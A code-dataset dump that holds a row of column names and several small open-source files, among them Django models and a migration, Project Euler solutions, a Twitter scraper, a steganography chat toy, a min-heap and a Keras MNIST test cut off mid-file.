blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8f0d1c6f1c3a8f8d9e42acba2344603fcafe173d | dc3d310934705034ab2f5bc4d3a96f07dab9b48b | /about_orm/app01/models.py | eb0e65d0120790442bd0561e2021c0df7c9e6ab5 | [] | no_license | createnewdemo/istudy_test | 82197488d9e9fa05e0c6cc91362645fc4555dc1d | 806693f2bee13e3c28571d0d75f6b6ea70acf7a0 | refs/heads/master | 2022-04-19T05:52:53.780973 | 2020-04-17T17:04:10 | 2020-04-17T17:04:10 | 256,507,355 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,957 | py | from django.db import models
# Create your models here.
class Person(models.Model):
    """Demo model exercising field options (custom column, auto timestamps) and Meta configuration."""
    pid = models.AutoField(primary_key=True)
    # Stored in DB column 'nick' (db_column override); VARCHAR(32), optional.
    name = models.CharField(db_column='nick',max_length=32,blank=True,null=True) #char
    age = models.IntegerField()
    birth = models.DateTimeField(auto_now=True)# current time saved automatically on every save
    #auto_now_add=True  save the current time automatically only when the record is created
    #auto_now=True      save the current time automatically when the record is created or edited
    class Meta:
        # Table name generated in the database; default is app name + underscore + class name.
        db_table = "Person"
        # Name displayed for this model in the admin site.
        verbose_name = '个人信息'
        # Plural form shown in the admin (default would be verbose_name plus an "s").
        verbose_name_plural = '所有用户信息'
        # # Composite index
        # index_together = [
        #     ("name", "age"),  # must be two existing fields
        # ]
        #
        # # Composite unique constraint
        # unique_together = (("name", "age"),)  # must be two existing fields
    def __str__(self):
        return "{}-{}".format(self.name,self.age)
class Publisher(models.Model):
    """Publishing house; referenced by Book through a foreign key."""
    name = models.CharField(max_length=32,verbose_name='出版社名称')
    def __str__(self):
        return "<Publisher object:{}-{}>".format(self.pk,self.name)
class Book(models.Model):
    """Book with price, sales and stock counters, linked to its publisher."""
    name = models.CharField(max_length=32,verbose_name='书名')
    # related_name/related_query_name customize the reverse accessors on Publisher.
    pub = models.ForeignKey(Publisher,on_delete=models.CASCADE,related_name='books',related_query_name='book')
    # max_digits=5, decimal_places=2 => largest representable price is 999.99.
    price = models.DecimalField(max_digits=5,decimal_places=2) #999.99
    sale = models.IntegerField()
    repertory = models.IntegerField()# stock / inventory count
    def __str__(self):
        return "<Book object:{}-{}>".format(self.pk,self.name)
class Author(models.Model):
    """Author with a many-to-many relation to Book (reverse accessor: book.authors)."""
    name = models.CharField(max_length=32,verbose_name='姓名')
    books = models.ManyToManyField('Book',related_name='authors')
    def __str__(self):
        return "<Author object:{}-{}>".format(self.pk,self.name)
| [
"320783214@qq.com"
] | 320783214@qq.com |
8f96c48c1e4bd9530d879ca2c31181ad9a56ae83 | 6e9f3e81af3ab66b10f8602544695ad9b035ffa5 | /jcoin/scripts/make-account.py | b95b671a8d4502546c79277eb6056937b88e1bef | [
"MIT"
] | permissive | slice/jose | 5ca7074e326e5fcffe7a1abfef249160644faa7c | 13e39b958f58fd024b3ba5b7ccd0a1cd7f02f14c | refs/heads/master | 2021-05-04T22:48:09.804518 | 2018-03-06T02:18:47 | 2018-03-06T02:18:47 | 99,070,186 | 0 | 0 | null | 2017-08-02T03:55:23 | 2017-08-02T03:55:23 | null | UTF-8 | Python | false | false | 198 | py | import requests
def main():
    """POST a wallet-creation request for the hard-coded user id and print the response."""
    payload = {'type': 0}
    response = requests.post(
        'http://0.0.0.0:8080/api/wallets/162819866682851329', json=payload)
    print(response)


if __name__ == '__main__':
    main()
| [
"lkmnds@gmail.com"
] | lkmnds@gmail.com |
ed2479409cc4d9b6931d821c5efacab31c8578a8 | 41fa2097f9037047ecb350f5b3efc30bc05f17e0 | /spiketoolkit/version.py | 5434119352b07fd912ca872cfaf3efdf17bfd578 | [
"MIT"
] | permissive | Shawn-Guo-CN/spiketoolkit | 7a670488b4a3009b7b410d4e172f9e547cee9566 | 11e60f3cd80c135c62e27538a4e141115a7e27ad | refs/heads/master | 2020-07-27T09:38:51.337170 | 2019-11-13T14:56:17 | 2019-11-13T14:56:17 | 209,047,879 | 0 | 0 | MIT | 2019-11-13T12:20:59 | 2019-09-17T12:28:09 | Python | UTF-8 | Python | false | false | 18 | py | version = '0.5.0'
| [
"alejoe9187@gmail.com"
] | alejoe9187@gmail.com |
4df461452801f2faf135f7c05f95ba61cea06067 | 9c6decc65c5dc7aed3aff66405cdafa3a750d8a5 | /Problem001-100/001 Multiples of 3 and 5.py | 7bd80a9209855897b4d5ae1373916f32144db95b | [] | no_license | Anfany/Project-Euler-by-Python3 | 9374a6a112843f03f7cda6b689a8fd7db7914a9d | 385e2c1c02b5e81111e054c3807911defde2dc29 | refs/heads/master | 2021-04-06T00:48:03.603738 | 2019-04-18T02:35:02 | 2019-04-18T02:35:02 | 124,505,893 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 190 | py | #!/usr/bin/python3.5
# -*- coding: UTF-8 -*-
#Author: AnFany
# Problem001 Multiples of 3 and 5
# Project Euler 001: sum every natural number below 1000 divisible by 3 or 5.
an = 0
for i in range(1, 1000):
    if i % 3 == 0 or i % 5 == 0:
        an += i
print(an)
# answer: 233168
| [
"noreply@github.com"
] | Anfany.noreply@github.com |
01219c0d59a45dc07bc0fe122f4f98a0001c725f | b665fe52aceca20944f5c7dfc74688370e514666 | /dbaas/physical/migrations/0012_auto__add_field_instance_status.py | 5e0c49703a3e5ac93acc5e802ce304b2ae2c9ef9 | [] | no_license | tsunli/database-as-a-service | 5e68ee22b1b46d30c6d83278407494971097d451 | 73573d495f62829259f656dfa0b642b9be4f2ead | refs/heads/master | 2021-01-24T15:06:42.029936 | 2015-07-02T21:42:44 | 2015-07-02T21:42:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,471 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Instance.status'
db.add_column(u'physical_instance', 'status',
self.gf('django.db.models.fields.IntegerField')(default=2),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Instance.status'
db.delete_column(u'physical_instance', 'status')
models = {
u'physical.databaseinfra': {
'Meta': {'object_name': 'DatabaseInfra'},
'capacity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'endpoint': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'endpoint_dns': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'engine': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Engine']"}),
'environment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Environment']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '406', 'blank': 'True'}),
'per_database_size_mbytes': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Plan']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'physical.engine': {
'Meta': {'unique_together': "((u'version', u'engine_type'),)", 'object_name': 'Engine'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'engine_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'engines'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.EngineType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user_data_script': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'physical.enginetype': {
'Meta': {'object_name': 'EngineType'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.environment': {
'Meta': {'object_name': 'Environment'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.host': {
'Meta': {'object_name': 'Host'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'monitor_url': ('django.db.models.fields.URLField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.instance': {
'Meta': {'unique_together': "((u'address', u'port'),)", 'object_name': 'Instance'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'databaseinfra': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'instances'", 'to': u"orm['physical.DatabaseInfra']"}),
'dns': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'hostname': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Host']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_arbiter': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'port': ('django.db.models.fields.IntegerField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.plan': {
'Meta': {'object_name': 'Plan'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'engine_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'plans'", 'to': u"orm['physical.EngineType']"}),
'environments': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['physical.Environment']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_ha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'max_db_size': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'provider': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.planattribute': {
'Meta': {'object_name': 'PlanAttribute'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'plan_attributes'", 'to': u"orm['physical.Plan']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['physical'] | [
"raposo.felippe@gmail.com"
] | raposo.felippe@gmail.com |
7355cb8b618bc1bf927c25c2ad8f74d161bec0bb | 6bf19501437a419bfb0b891a1ac55b52ab833b97 | /apps/master/actors/chat.py | c391adc38b6c2b7c8daffee794dcb38e1e27239d | [
"Apache-2.0"
] | permissive | jdelrue/digital_me | 330351edbfa5ffb931f5f0592c5738432c2eaa88 | 5e4699a3c94088fa089e0c1fefab9955cd6bd927 | refs/heads/master | 2020-04-07T16:56:53.703863 | 2018-07-31T13:08:30 | 2018-07-31T13:08:30 | 158,549,943 | 0 | 0 | NOASSERTION | 2018-11-21T13:11:28 | 2018-11-21T13:11:28 | null | UTF-8 | Python | false | false | 1,075 | py | from jumpscale import j
#BE CAREFUL MASTER IS IN: /code/github/threefoldtech/jumpscale_lib/JumpscaleLib/servers/gedis/base/actors/chat.py
JSBASE = j.application.jsbase_get_class()
class chat(JSBASE):
    """
    Gedis actor exposing the chatbot session work queue over RPC.
    NOTE(review): the method docstrings below look like gedis in/out schema
    definitions, so they are deliberately left byte-identical.
    """
    def __init__(self):
        JSBASE.__init__(self)
        # Chatbot of the most recently started gedis server.
        self.chatbot = j.servers.gedis.latest.chatbot
        #check self.chatbot.chatflows for the existing chatflows
        #all required commands are here
    def work_get(self, sessionid,schema_out):
        """
        ```in
        sessionid = "" (S)
        ```
        ```out
        cat = "" (S)
        msg = "" (S)
        ```
        """
        # Fetch the next pending work item (category, message) for this session.
        cat,msg = self.chatbot.session_work_get(sessionid)
        return {"cat":cat,"msg":msg}
    def work_report(self, sessionid, result):
        """
        ```in
        sessionid = "" (S)
        result = "" (S)
        ```
        ```out
        ```
        """
        # Hand the client's result back to the chatflow waiting on this session.
        self.chatbot.session_work_set(sessionid,result)
    def session_alive(self,sessionid,schema_out):
        #TODO:*1 check if greenlet is alive
        pass
| [
"kristof@incubaid.com"
] | kristof@incubaid.com |
51242aad84f877f6312483b22294f379050c32d6 | c8a7ccfb42628d1100562a053c4334488e1bf239 | /shell_cartesian_product.py | 6fa93aafa24d0d97ef46b832a619ec80dfc50343 | [
"CC0-1.0"
] | permissive | LyricLy/python-snippets | 8487619a916e33e02b5772aba577d9dafdfd803b | 9d868b7bbccd793ea1dc513f51290963584a1dee | refs/heads/master | 2020-04-08T01:57:22.511167 | 2018-11-24T08:12:20 | 2018-11-24T08:12:20 | 158,916,096 | 1 | 0 | CC0-1.0 | 2018-11-24T08:16:59 | 2018-11-24T08:16:59 | null | UTF-8 | Python | false | false | 624 | py | #!/usr/bin/env python3
# encoding: utf-8
import re as _re
def expand(str):
    """Expand a string with one non-nested ``{a,b}`` alternation into two strings.

    Returns a 2-tuple of the two expanded variants, or the input string
    unchanged when it contains no ``{a,b}`` group.

    Fix: the old return annotation ``-> (str, str)`` was removed — it
    evaluated to a tuple of classes (not a valid type) and was wrong for
    the plain-string return path.

    >>> expand('foo{bar,baz}')
    ('foobar', 'foobaz')
    >>> expand('{old,new}')
    ('old', 'new')
    >>> expand('uninteresting')
    'uninteresting'
    """
    # NOTE: the parameter shadows the builtin ``str``; kept as-is so any
    # keyword callers (expand(str=...)) are not broken.
    match = _re.search(r'{([^{}]*),([^{}]*)}', str)
    if match is None:
        return str
    prefix, suffix = str[:match.start()], str[match.end():]
    return (
        prefix + match.group(1) + suffix,
        prefix + match.group(2) + suffix,
    )
def _test():
    """Run this module's doctests."""
    from doctest import testmod
    testmod()


if __name__ == '__main__':
    _test()
| [
"bmintz@protonmail.com"
] | bmintz@protonmail.com |
c7efb64ec9be875434887caa7539ac4f76f26d5e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02398/s216293399.py | f27ba33161028edb6af38fe51bdbad406e51b2e2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | from sys import stdin
# Read a, b, c and count the divisors of c that lie in [a, b].
a, b, c = (int(token) for token in stdin.readline().split())
divisors = [d for d in range(a, b + 1) if c % d == 0]
print(len(divisors))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
bc5a5fe7fe9489e01e90443f9ac694caba89f548 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02681/s356994323.py | 1a9332ce96290a7bc4f73232250e7871b5299d84 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 97 | py | S = input()
T = input()
# S with T's last character appended must equal T for the answer to be Yes.
S = S + T[-1]
ans = 'Yes' if S == T else 'No'
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
5bed01a254bd62b699ed700ae1d181c947b9b35a | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/B/buttub/basic_twitter_scraper_210.py | 9d1bd12d5fb4a5b4529a86e87666c11c1e6b964c | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,288 | py | ###################################################################################
# Twitter scraper - designed to be forked and used for more interesting things
###################################################################################
import scraperwiki
import simplejson
import urllib2
# Change QUERY to your search term of choice.
# Examples: 'newsnight', 'from:bbcnewsnight', 'to:bbcnewsnight'
QUERY = 'from:thequote'
RESULTS_PER_PAGE = '100'
LANGUAGE = 'en'
NUM_PAGES = 20
for page in range(1, NUM_PAGES+1):
base_url = 'http://search.twitter.com/search.json?q=%s&rpp=%s&lang=%s&page=%s' \
% (urllib2.quote(QUERY), RESULTS_PER_PAGE, LANGUAGE, page)
try:
results_json = simplejson.loads(scraperwiki.scrape(base_url))
for result in results_json['results']:
data = {}
data['id'] = result['id']
data['text'] = result['text']
data['from_user'] = result['from_user']
print data['from_user'], data['text']
scraperwiki.sqlite.save(["id"], data)
except:
print 'Oh dear, failed to scrape %s' % base_url
###################################################################################
# Twitter scraper - designed to be forked and used for more interesting things
###################################################################################
import scraperwiki
import simplejson
import urllib2
# Change QUERY to your search term of choice.
# Examples: 'newsnight', 'from:bbcnewsnight', 'to:bbcnewsnight'
QUERY = 'from:thequote'
RESULTS_PER_PAGE = '100'
LANGUAGE = 'en'
NUM_PAGES = 20
for page in range(1, NUM_PAGES+1):
base_url = 'http://search.twitter.com/search.json?q=%s&rpp=%s&lang=%s&page=%s' \
% (urllib2.quote(QUERY), RESULTS_PER_PAGE, LANGUAGE, page)
try:
results_json = simplejson.loads(scraperwiki.scrape(base_url))
for result in results_json['results']:
data = {}
data['id'] = result['id']
data['text'] = result['text']
data['from_user'] = result['from_user']
print data['from_user'], data['text']
scraperwiki.sqlite.save(["id"], data)
except:
print 'Oh dear, failed to scrape %s' % base_url
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
7d254cf76a88c8dfee2d600c08809f29ae21763e | d7e131777d76b98d76cc3a37f96313282b1ad69c | /functions.py | 856222fe9fdc0a66c0ab04d04595eca664c857c5 | [] | no_license | prashararchi/spy-chat | bd7e71bbcb627c075e196f1c487d8039ac843db4 | 9d2cb9a81f78ac7afc08642d6669988d3ee67500 | refs/heads/master | 2020-12-02T22:10:09.834229 | 2017-07-03T10:04:17 | 2017-07-03T10:04:17 | 96,092,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,494 | py | from spy_details import*
from steganography.steganography import Steganography
from colorama import init,Fore,Style
from datetime import datetime
#reading chat_history
def read_chat_history():
read_for = select_friend()
for chat in friends[read_for].chats:
if chat.sent_by_me:
init(autoreset=True)
msg_chat=Fore.BLUE+chat.time.strftime("%d %b %y")
print '[%s] %s: %s' %(msg_chat ,'You said:' ,chat.message)
else:
print '[%s] %s said: %s' % (msg_chat, friends[read_for].name, chat.message)
#starting chat
def start_chat(user):
    """Main menu loop: dispatch the user's menu selection until they exit (choice 6)."""
    actions = {
        1: add_status,
        2: add_friend,
        3: send_message,
        4: read_message,
        5: read_chat_history,
    }
    running = True
    while running:
        choice = menu_choices()
        if choice == 6:
            running = False
        elif choice in actions:
            actions[choice]()
        else:
            print ("Wrong choice.Sorry you are not of the correct age to be a spy")
#introducing menu_choice
def menu_choices():
    """Show the main menu and return the user's numeric selection."""
    options = (
        "1. Add a status",
        "2. Add a friend",
        "3. Send a secret message",
        "4. Receive/Read secret message",
        "5. Read chat History",
        "6. Exit Application.",
    )
    for option in options:
        print(option)
    return int(raw_input("Enter your choice: "))
#adding status
def add_status():
    """Let the user type a new status or pick one from the built-in list.

    Returns the chosen status string.

    Bug fix: the selected status used to be assigned to a local variable and
    then discarded, so the function had no observable effect; it is now
    returned (backward compatible — previous callers ignored the None return).
    """
    all_status = ['available', 'sleeping', 'at work']
    choice = int(raw_input("press 1 to add new status or press other key to add other status"))
    if choice == 1:
        current_status = raw_input("enter new status")
        all_status.append(current_status)
    else:
        # Show the options as a 1-based numbered list.
        count = 1
        for temp in all_status:
            print("%d %s" % (count, temp))
            count += 1
        choose = int(raw_input("which status you want?"))
        current_status = all_status[choose - 1]
    return current_status
#adding friend
def add_friend():
new_friend = Spy('','',0,0.0)
new_friend.name = raw_input("enter friends name")
new_friend.salutation = raw_input("enter mr or ms")
new_friend.age =int(raw_input("enter age"))
new_friend.rating = float(raw_input("enter rating"))
if len(new_friend.name) > 0 and new_friend.age > 12 :
friends.append(new_friend)
else:
print 'Invalid entry. We cant add spy with the details you provided'
return len(friends)
#selecting friend
def select_friend():
    """List all friends and return the 0-based index of the one chosen.

    Bug fix: this used to return the raw 1-based menu choice while computing
    (and discarding) the 0-based index ``frnd``; every caller indexes
    ``friends`` with the return value, so the second friend was shown for
    choice 1 and the last choice raised IndexError. It now returns the
    0-based index.
    """
    for friend in friends:
        print (friend.name, friend.age, friend.rating)
    # The list shown to the user is effectively 1-based; convert to an index.
    friend_choice = int(raw_input("choose: "))
    return friend_choice - 1
#sending message
def send_message():
    """Hide the fixed secret message inside an image and record it as a sent chat.

    Bug fix: removed the unconditional tail call to send_message() at the end
    of the function, which made it recurse forever (eventual RecursionError).
    """
    friend_choice = select_friend()
    original_image = 'nature.jpg'
    output_path = 'output.jpg'
    # The secret message embedded into the output image.
    text = 'YOO I DID IT.FINALLY I AM FEELING GOOD'
    Steganography.encode(original_image, output_path, text)
    new_chat = chat_message(text, True)
    friends[friend_choice].chats.append(new_chat)
    print ("Your secret message is ready")
#reading message
def read_message():
sender = select_friend()
output_path =("output.jpg")
get = Steganography.decode(output_path)
print get
new_chat = chat_message( get,False)
friends[sender].chats.append(new_chat)
print("your message has been sent")
read_message()
| [
"="
] | = |
a78dbd6d284e4a6f01a1019211971bc9c0c8c61b | 0d942316070509955bad7ee774ac417e5c7b1235 | /datastructures/minheap.py | 34ab3809f1483e9783635f1a0761b4eb078ad011 | [] | no_license | rlavanya9/hackerrank | 4750ad48d5d249f1d58e6eff205e585f17e6a78b | 64e6686df62c1f1cdaa7dfb6d0c4525d236c197b | refs/heads/master | 2023-03-24T15:50:41.616353 | 2021-03-19T17:26:54 | 2021-03-19T17:26:54 | 349,502,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,044 | py | """
Min Heap Implementation in Python
"""
class MinHeap:
    """Array-backed binary min-heap.

    Index 0 holds a dummy value so that, for the node stored at index i,
    the parent lives at i // 2 and the children at 2*i and 2*i + 1.
    """

    def __init__(self):
        # Slot 0 is a placeholder; real elements start at index 1.
        self.heap_list = [0]
        self.current_size = 0

    def sift_up(self, i):
        """Bubble the value at index i toward the root to restore the heap property."""
        while i // 2 > 0:
            parent = i // 2
            if self.heap_list[i] < self.heap_list[parent]:
                self.heap_list[parent], self.heap_list[i] = (
                    self.heap_list[i], self.heap_list[parent])
            i = parent

    def insert(self, k):
        """Add k to the heap, keeping the heap property."""
        self.heap_list.append(k)
        self.current_size += 1
        # New elements enter at the bottom and bubble up into place.
        self.sift_up(self.current_size)

    def sift_down(self, i):
        """Push the value at index i down toward the leaves to restore the heap property."""
        # Loop while the node at i has at least one child.
        while 2 * i <= self.current_size:
            child = self.min_child(i)
            if self.heap_list[i] > self.heap_list[child]:
                self.heap_list[i], self.heap_list[child] = (
                    self.heap_list[child], self.heap_list[i])
            i = child

    def min_child(self, i):
        """Return the index of the smaller child of node i (assumes a left child exists)."""
        left, right = 2 * i, 2 * i + 1
        if right > self.current_size:
            # Only one child.
            return left
        if self.heap_list[left] < self.heap_list[right]:
            return left
        return right

    def delete_min(self):
        """Remove and return the smallest value, or the string 'Empty heap' when empty."""
        # Length 1 means only the placeholder is left, i.e. the heap is empty.
        if len(self.heap_list) == 1:
            return 'Empty heap'
        root = self.heap_list[1]
        # Move the last element to the root, shrink, then sift it down.
        self.heap_list[1] = self.heap_list[self.current_size]
        self.heap_list.pop()
        self.current_size -= 1
        self.sift_down(1)
        return root
"""
Driver program
"""
# Same tree as above example.
my_heap = MinHeap()
my_heap.insert(5)
my_heap.insert(6)
my_heap.insert(7)
my_heap.insert(9)
my_heap.insert(13)
my_heap.insert(11)
my_heap.insert(10)
print(my_heap.delete_min()) # removing min node i.e 5 | [
"rangaswamy.lavanya@gmail.com"
] | rangaswamy.lavanya@gmail.com |
cd3e76b86f9d33e10b10335157e5d340ce734962 | 0fdc732fcdad1c0d76d6ec80cb6e25b6ec17d6e1 | /generic_views/display_views/models.py | 09bf2b21330b7de58380a241d44bb9f07e61cb04 | [
"MIT"
] | permissive | markbirds/Django-Code-Repo | 9b3c8bfba948dd8ea1be71e31cbfd2ef26bfa157 | b55762d2dab00640acf2e8e00ddc66716d53c6b5 | refs/heads/master | 2023-01-05T22:44:16.405853 | 2020-11-03T07:17:50 | 2020-11-03T07:17:50 | 299,615,438 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | import uuid
from django.db import models
class DisplayViewModel(models.Model):
    """Demo model with a UUID primary key used by the display-views examples."""
    # Client-side generated UUID primary key; hidden from forms (editable=False).
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    name = models.CharField(unique=True,max_length=50)
    age = models.IntegerField()
    def get_absolute_url(self):
        """Return the canonical detail-view URL for this instance."""
        from django.urls import reverse
        return reverse('display_views:detail_view', args=[str(self.id)])
    def __str__(self):
        return f'{self.name} - {self.id}'
| [
"fowenpatrick@gmail.com"
] | fowenpatrick@gmail.com |
b6edf643e623372579197f494e3f4691341ddcb7 | 4d56399b01d06946024822edcdf2b45bbc1dfe8f | /tests/app/TestMnistFlow.py | 8f88a7e2bb5e318f3bfeb41e1b6c8a2ca68253c7 | [] | no_license | fletch22/nba_win_predictor | 961b520b50cd5bebceb8c5d2bc91bc0dc71715ef | aff78780aca8a54c22e904cdcdee569278d4f5fc | refs/heads/master | 2023-08-11T02:44:22.613419 | 2020-04-09T21:32:38 | 2020-04-09T21:32:38 | 181,233,092 | 0 | 0 | null | 2021-08-25T14:57:49 | 2019-04-13T22:01:58 | Python | UTF-8 | Python | false | false | 2,443 | py | import warnings
from app.models.mnist_pretrained import get_vgg16_for_mnist
warnings.filterwarnings('ignore')
import os
from unittest import TestCase
from keras.layers import Convolution2D, MaxPooling2D
from keras.layers import Flatten, Dense
from keras.models import Sequential
from keras.preprocessing.image import ImageDataGenerator
from app.config import config
# Input images are resized to dimension x dimension pixels (RGB, see input_shape below).
dimension = 44
img_width, img_height = dimension, dimension
# Image folders; presumably one sub-directory per digit class — TODO confirm layout.
